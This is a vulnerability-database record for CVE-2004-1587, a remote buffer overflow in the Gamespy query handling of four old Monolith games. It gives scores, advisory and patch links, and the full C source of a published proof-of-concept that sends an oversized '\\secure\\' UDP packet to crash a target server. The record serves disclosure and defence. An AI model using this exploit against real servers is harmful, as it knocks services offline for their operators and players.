ID OSVDB:10635Type osvdbReporter OSVDBModified 2004-10-08T04:53:23
Description
No description provided by the source
References:
Vendor URL: http://www.lith.com
Security Tracker: 1011603
Secunia Advisory ID:12776
Other Solution URL: http://aluigi.altervista.org/patches/nolf1004-fix.zip
Other Solution URL: http://aluigi.altervista.org/patches/avp2-1096-fix.zip
Other Solution URL: http://aluigi.altervista.org/patches/blood2-21-fix.zip
Other Solution URL: http://aluigi.altervista.org/patches/shogo22-fix.zip
Other Advisory URL: http://aluigi.altervista.org/adv/lithsec-adv.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-10/0071.html
CVE-2004-1587
{"type": "osvdb", "published": "2004-10-08T04:53:23", "href": "https://vulners.com/osvdb/OSVDB:10635", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/", "score": 5.0}, "viewCount": 1, "edition": 1, "reporter": "OSVDB", "title": "Monolith Multiple Game \\secure\\ Gamespy Query Remote Overflow", "affectedSoftware": [], "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2017-04-28T13:20:06", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-1587"]}, {"type": "exploitdb", "idList": ["EDB-ID:571"]}], "modified": "2017-04-28T13:20:06", "rev": 2}, "vulnersScore": 6.2}, "references": [], "id": "OSVDB:10635", "lastseen": "2017-04-28T13:20:06", "cvelist": ["CVE-2004-1587"], "modified": "2004-10-08T04:53:23", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.lith.com\nSecurity Tracker: 1011603\n[Secunia Advisory ID:12776](https://secuniaresearch.flexerasoftware.com/advisories/12776/)\nOther Solution URL: http://aluigi.altervista.org/patches/nolf1004-fix.zip\nOther Solution URL: http://aluigi.altervista.org/patches/avp2-1096-fix.zip\nOther Solution URL: http://aluigi.altervista.org/patches/blood2-21-fix.zip\nOther Solution URL: http://aluigi.altervista.org/patches/shogo22-fix.zip\nOther Advisory URL: http://aluigi.altervista.org/adv/lithsec-adv.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-10/0071.html\n[CVE-2004-1587](https://vulners.com/cve/CVE-2004-1587)\n"}
{"cve": [{"lastseen": "2020-10-03T11:33:40", "description": "Buffer overflow in Monolith games including (1) Alien versus Predator 2 1.0.9.6 and earlier, (2) Blood 2 2.1 and earlier, (3) No one lives forever 1.004 and earlier and (4) Shogo 2.2 and earlier allows remote attackers to cause a denial of service (application crash) via a long secure Gamespy query.", "edition": 3, "cvss3": {}, "published": "2004-12-31T05:00:00", "title": "CVE-2004-1587", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-1587"], "modified": "2017-07-11T01:31:00", "cpe": ["cpe:/a:monolith_productions:alien_versus_predator:2.1.0.9.6", "cpe:/a:monolith_productions:no_one_lives_forever:1.0.004", "cpe:/a:monolith_productions:blood:2_2.1", "cpe:/a:monolith_productions:shogo:2.2"], "id": "CVE-2004-1587", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1587", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:monolith_productions:blood:2_2.1:*:*:*:*:*:*:*", "cpe:2.3:a:monolith_productions:no_one_lives_forever:1.0.004:*:*:*:*:*:*:*", "cpe:2.3:a:monolith_productions:alien_versus_predator:2.1.0.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:monolith_productions:shogo:2.2:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T12:28:17", "description": "Monolith Games Local Buffer Overflow Exploit. CVE-2004-1587. Dos exploit for windows platform", "published": "2004-10-10T00:00:00", "type": "exploitdb", "title": "Monolith Games Local Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1587"], "modified": "2004-10-10T00:00:00", "id": "EDB-ID:571", "href": "https://www.exploit-db.com/exploits/571/", "sourceData": "/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <net/inet.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1.1\"\r\n#define PORT 27888\r\n#define TIMEOUT 3\r\n#define BUFFSZ 2048\r\n#define PCK \"\\\\secure\\\\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"\\x55\\x44\\x33\\x22\"\r\n /* return address, each byte must be >= 0x20 and <= 0x7f */\r\n\r\n\r\n\r\nvoid gs_info_udp(u_long ip, u_short port);\r\nint timeout(int sock);\r\nu_long resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n int sd;\r\n u_short port = PORT;\r\n struct sockaddr_in peer;\r\n\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"\\\\secure\\\\ buffer overflow in some old Monolith games \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: aluigi@altervista.org\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\n\"\r\n \"Usage: %s <server> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Vulnerable games Latest versions\\n\"\r\n \" Alien versus predator 2 1.0.9.6\\n\"\r\n \" Blood 2 2.1\\n\"\r\n \" No one lives forever 1.004\\n\"\r\n \" Shogo 2.2\\n\"\r\n \"\\n\"\r\n \"Note: the return address will be overwritten by 0x%08lx\\n\"\r\n \" (only the bytes from 0x20 to 0x7f are allowed)\\n\"\r\n \"\\n\", argv[0], port, *(u_long *)(PCK + 72));\r\n exit(1);\r\n }\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n if(argc > 2) port = atoi(argv[2]);\r\n\r\n peer.sin_addr.s_addr = resolv(argv[1]);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target is %s:%hu\\n\\n\",\r\n inet_ntoa(peer.sin_addr), port);\r\n\r\n fputs(\"- Request informations:\\n\", stdout);\r\n gs_info_udp(peer.sin_addr.s_addr, port);\r\n\r\n fputs(\"- Send BOOM packet:\\n\", stdout);\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n if(sendto(sd, PCK, sizeof(PCK) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n close(sd);\r\n\r\n fputs(\"- Check server:\\n\", stdout);\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n if(sendto(sd, \"\\\\status\\\\\", 8, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\nServer IS vulnerable!!!\\n\\n\", stdout);\r\n } else {\r\n fputs(\"\\nServer doesn't seem vulnerable\\n\\n\", stdout);\r\n }\r\n\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nvoid gs_info_udp(u_long ip, u_short port) {\r\n struct sockaddr_in peer;\r\n int sd,\r\n len,\r\n nt = 1;\r\n u_char buff[2048],\r\n *p1,\r\n *p2;\r\n\r\n peer.sin_addr.s_addr = ip;\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n if(sendto(sd, \"\\\\status\\\\\", 8, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\nError: socket timeout, no replies received. Probably the server doesn't support the Gamespy query protocol or the port is wrong\\n\\n\", stdout);\r\n close(sd);\r\n exit(1);\r\n }\r\n\r\n len = recvfrom(sd, buff, sizeof(buff) - 1, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n\r\n buff[len] = 0x00;\r\n p1 = buff;\r\n while((p2 = strchr(p1, '\\\\'))) {\r\n *p2 = 0x00;\r\n\r\n if(!nt) {\r\n if(!*p1) break;\r\n printf(\"%30s: \", p1);\r\n nt++;\r\n } else {\r\n printf(\"%s\\n\", p1);\r\n nt = 0;\r\n }\r\n p1 = p2 + 1;\r\n }\r\n printf(\"%s\\n\\n\", p1);\r\n close(sd);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n int err;\r\n\r\n tout.tv_sec = TIMEOUT;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\r\n if(err < 0) std_err();\r\n if(!err) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu_long resolv(char *host) {\r\n struct hostent *hp;\r\n u_long host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_long *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\n\n// milw0rm.com [2004-10-10]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/571/"}]}
